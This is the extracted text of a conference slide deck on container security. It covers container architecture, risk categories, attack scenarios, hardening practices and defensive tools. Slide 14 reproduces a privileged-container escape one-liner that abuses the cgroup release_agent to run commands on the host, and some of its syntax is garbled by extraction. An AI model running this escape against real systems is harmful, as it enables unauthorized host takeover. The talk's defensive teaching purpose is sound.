This slide is the speech provided by me for InfoSec2020 (https://2020.infosec.org.tw/) conference in Taiwan. It describes the container security, what issues is. how to exploit it and how to defense it.

1. Container Security
Jie @ InfoSec2020
Nov/02/2020

2. curl -X GET https://2130706433/info
{
“Name”:
“Jie”,
“Experience”: [
“IBM Security”,
“Qualcomm”,
“National Center of High-Performance Computing”],
“Certification”: [
“CCIE #50382”,
“OSCP”,
“CEH”]
} https://www.linkedin.com/in/jieliau
https://github.com/jieliau
https://www.facebook.com/jie.liau
https://twitter.com/0xJieLiau
https://medium.com/@liau.weijie

3. Gartner predicts that by 2023,
70% of organizations will be running three or more containerized applications in production

4. ?

5. Infrastructure
Hypervisor
Guest OS Guest OS Guest OS
Bin/Lib Bin/Lib Bin/Lib
App1 App2 App2
Infrastructure
Host OS
Bin/Lib Bin/Lib Bin/Lib
App1 App2 App3
Container Engineer
Virtual Machine Virtual Machine Virtual Machine
Containerized
Application
Containerized
Application
Containerized
Application

6. Open Container Initiative - OCI
• Runtime Spec
• namespace
• cgroups
• Image Spec
• Layer
• Image index
• Configuration

10. Security Issues

11. Host OS Risk
Orchestration System Risks Image Risks
Container Runtime RisksRegistry Risks
•Improper user access rights
•OS vulnerabilities
•Unbounded admin access
•Weak or unmanaged credentials
•Unmanaged inter-container network
traffic
•Mixed of workload sensitivity levels
•Insecure connections to registries
•Stale images in registries
•Image vulnerabilities
•Image configuration
•Embedded malware
•Embedded secrets
•Image trust
•Vulnerabilities within the runtime
software
•Unbounded network access from
containers
•Insecure container runtime
configurations
•Shared kernel
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-190.pdf

12. Container escape to the host

13. Container should not run as root
Use non-root user in your Dockerfile

14. Privileged Container is so Bad
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
https://twitter.com/_fel1x/status/1151487051986087936

15. Bad Image

16. Open Docker API
Docker host
Client Host
Geek

17. Attack Scenario I
Vulnerable Container
1. Attack vulnerable container
2. Compromise the host
Docker Host or K8s Cluster

18. Attack Scenario II
Bad Container
1. Push bad image
2. Deploy by admin
3. Create bad container
Docker Host or K8s cluster

19. Attack Scenario III
Privileged Container
1. Find out open docker host
2. Create privileged container
3. Compromise the host
Open Docker Host

20. Bad Image for Cryptocurrency Mining
https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining

21. Kinsing Malware Attacks Targeting Container Env
https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability

23. BestPractices

24. • Always use the most up to date version of Docker
• Allow only trusted users control of the Docker daemon by making sure only trusted users are members of Docker group
• Run your containers as a non-root user (UID not 0)
• Use only trusted base images when building your containers
• Use minimal base images that don’t include unnecessary software packages that could lead to a larger attack surface
• Don’t store secrets in images/Dockerfiles
• When running containers, remove all capabilities not required for the container to function as needed
• Don’t run containers with –privileged flag
• Don’t mount sensitive host system directories on containers, especially in writable mode that could expose them to being changed maliciously in a way
that could lead to host compromise
• Don’t run sshd within containers
• Don’t map any ports below 1024 within a container as they are considered privileged because they transmit sensitive data
• Make sure you have rules in place that give you an audit trail for:
• Docker daemon and Docker files and directories:
• /var/lib/docker
• /etc/docker
• docker.service
• docker.socket
• /etc/default/docker
• /etc/docker/daemon.json
• /etc/sysconfig/docker
• /usr/bin/containerd
• /usr/sbin/runc https://www.stackrox.com/post/2019/09/docker-security-101/

25. CAP-ADD instead of Privileged
• —cap-add
• SYS_ADMIN
• NET_ADMIN
• MAC_ADMIN
• NET_RAW
• SYS_TIME
• SYSLOG
• …
https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities

26. Limit Resource Usage
• —memory
• —cpus
• —cpu-period
• —pids-limit
• —kernel-memory
• —device-read-bps
• —device-read-ios
• —device-write-bgp
• —device-write-ios
https://docs.docker.com/config/containers/resource_constraints/

27. Open Source Tools for Docker Security
• Docker Bench for Security
• Clair
• Cilium
• Anchore
• OpenSCAP Workbench
• Dagda
• Notary
• Grafaes
• Sysdig Falco
• Banyanops Collector
https://techbeacon.com/security/10-top-open-source-tools-docker-security

29. Container Visibility is So Damn Important
https://blog.gigamon.com/2019/09/19/if-you-dont-have-container-visibility-your-organization-is-at-risk/

30. https://github.com/sysflow-telemetry

31. References

32. • https://www.stackrox.com/post/2020/03/6-container-adoption-trends-of-2020/
• https://www.docker.com/blog/containers-replacing-virtual-machines/
• https://blog.aquasec.com/cve-2016-9962-run-container-run
• https://medium.com/@mccode/processes-in-containers-should-not-run-as-
root-2feae3f0df3b
• https://containerjournal.com/topics/container-security/why-running-a-privileged-
container-is-not-a-good-idea/
• https://docs.docker.com/engine/api/
• https://docs.docker.com/engine/api/v1.40/#operation/ContainerCreate
• https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/
malicious-docker-hub-container-images-cryptocurrency-mining
• https://docs.docker.com/config/containers/resource_constraints/
• https://techbeacon.com/security/10-top-open-source-tools-docker-security

33. ThankYou!!!